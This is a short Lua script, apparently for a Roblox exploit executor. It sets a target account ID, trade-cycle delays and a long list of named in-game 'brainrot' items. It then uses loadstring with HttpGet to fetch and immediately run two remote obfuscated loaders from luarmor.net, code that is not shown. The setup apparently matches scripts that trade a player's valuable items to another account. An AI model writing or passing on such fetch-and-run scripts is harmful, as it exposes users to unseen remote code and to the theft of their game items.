getgenv().SECRET_KEY = "mrr_ee7edd2bbf1a4574a02bf2ab08607120"
getgenv().TARGET_ID = 6074348674
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Fortunu and Cashuru"] = true,
    ["Los Amigos"] = true,
    ["Los Sekolahs"] = true,
    ["La Ginger Sekolah"] = true,
    ["Sammyni Fattini"] = true,
    ["Los Spaghettis"] = true,
    ["Cloverat Clapat"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Rosetti Tualetti"] = true,
    ["Fishino Clownino"] = true,
    ["Gold Gold Gold"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Lavadorito Spinito"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Swaggy Bros"] = true,
    ["La Romantic Grande"] = true,
    ["Orcaledon"] = true,
    ["Tictac Sahur"] = true,
    ["La Taco Combinasion"] = true,
    ["Ketupat Kepat"] = true,
    ["Tang Tang Keletang"] = true,
    ["Lovin Rose"] = true,
    ["Los Tacoritas"] = true,
    ["Eviledon"] = true,
    ["Los Primos"] = true,
    ["W or L"] = true,
    ["Esok Sekolah"] = true,
    ["La Jolly Grande"] = true,
    ["Los Cupids"] = true,
    ["Los Puggies"] = true,
    ["Tralaledon"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Tuff Toucan"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["La Spooky Grande"] = true,
    ["Los Bros"] = true,
    ["La Extinct Grande"] = true,
    ["Celularcini Viciosini"] = true,
    ["Money Money Puggy"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Planitos"] = true,
    ["Las Sis"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Swag Soda"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Dragon Cannelloni"] = true,
    ["Meowl"] = true,
    ["Headless Horseman"] = true,
    ["Skibidi Toilet"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/9b7f0a065a587b127a8a15389a81a58b.lua"))()
end)
